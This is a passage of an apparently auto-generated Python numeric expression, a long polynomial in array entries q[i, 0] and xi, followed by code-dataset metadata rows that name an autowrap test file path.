0])*(-2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 53.3333333333333*q[3, 0] + 26.6666666666667*q[4, 0] + 26.6666666666667*q[5, 0]) + (-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1)*(-51312626661.0909*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**5 + 1623563577.94858*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 31963907.9408627*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 337119.341563786*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1422.22222222222*q[3, 0]**2 + 1422.22222222222*q[3, 0]*q[4, 0] + 1422.22222222222*q[3, 0]*q[5, 0] - 1422.22222222222*q[4, 0]**2 + 1422.22222222222*q[4, 0]*q[5, 0] - 1422.22222222222*q[5, 
0]**2 + 1))*(60131984.3684659*xi**9*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 - 1522090.85432679*xi**7*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 + 22474.6227709191*xi**5*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 - 79.0123456790123*xi**3*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(2*q[6, 0]**2 - 2*q[6, 0]*q[7, 0] - 2*q[6, 0]*q[8, 0] + 2*q[7, 0]**2 - 2*q[7, 0]*q[8, 0] + 2*q[8, 0]**2) + (1/3)*xi*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 
0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])) + (-12828156665.2727*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 2004399.47894886*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*(2*q[3, 0] - q[4, 0] - q[5, 0])**2 + 1)*(2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0]) + (2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 
4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 53.3333333333333*q[3, 0] - 26.6666666666667*q[4, 0] - 26.6666666666667*q[5, 0])*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1))*(-160351958.315909*xi**10*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*xi**2*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 
0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-38484469995.8182*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 1217672683.46143*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 23972930.955647*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 252839.506172839*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1066.66666666667*(q[4, 0] - q[5, 0])**2 + 1) + (4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0]))*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - 
q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0]))*(2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[7, 0] - 
q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + 60131984.3684659*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 1522090.85432679*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 22474.6227709191*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 79.0123456790123*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(2*q[0, 0]**2 - 2*q[0, 0]*q[1, 0] - 2*q[0, 0]*q[2, 0] + 2*q[1, 0]**2 - 2*q[1, 0]*q[2, 0] + 2*q[2, 0]**2) + (4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - 
q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)) + (-160351958.315909*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] 
+ q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0]) + (60131984.3684659*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*q[3, 0] + (1/3)*q[4, 0] + (1/3)*q[5, 0] + 0.15)*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1) + (1/3)*q[0, 0] + (1/3)*q[1, 0] + (1/3)*q[2, 0] + 0.15]
])
| 8,575.571429
| 20,373
| 0.408119
| 16,926
| 60,029
| 1.447418
| 0.005376
| 0.241071
| 0.108862
| 0.107596
| 0.997265
| 0.997061
| 0.994163
| 0.992612
| 0.992326
| 0.991714
| 0
| 0.371215
| 0.176931
| 60,029
| 7
| 20,374
| 8,575.571429
| 0.124636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.142857
| 0.142857
| 0.428571
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 14
|
941a171cda5c978afdbc1cfcc4cf862ee027a62c
| 196
|
py
|
Python
|
tests/test_files/converters/__init__.py
|
OpenMS/autowrap
|
050e63292b857a97b3cea7991d82bdedaaf7e4ee
|
[
"BSD-3-Clause"
] | 2
|
2022-01-29T12:34:58.000Z
|
2022-02-02T09:42:30.000Z
|
tests/test_files/converters/__init__.py
|
OpenMS/autowrap
|
050e63292b857a97b3cea7991d82bdedaaf7e4ee
|
[
"BSD-3-Clause"
] | 37
|
2022-01-05T17:06:14.000Z
|
2022-03-30T19:14:32.000Z
|
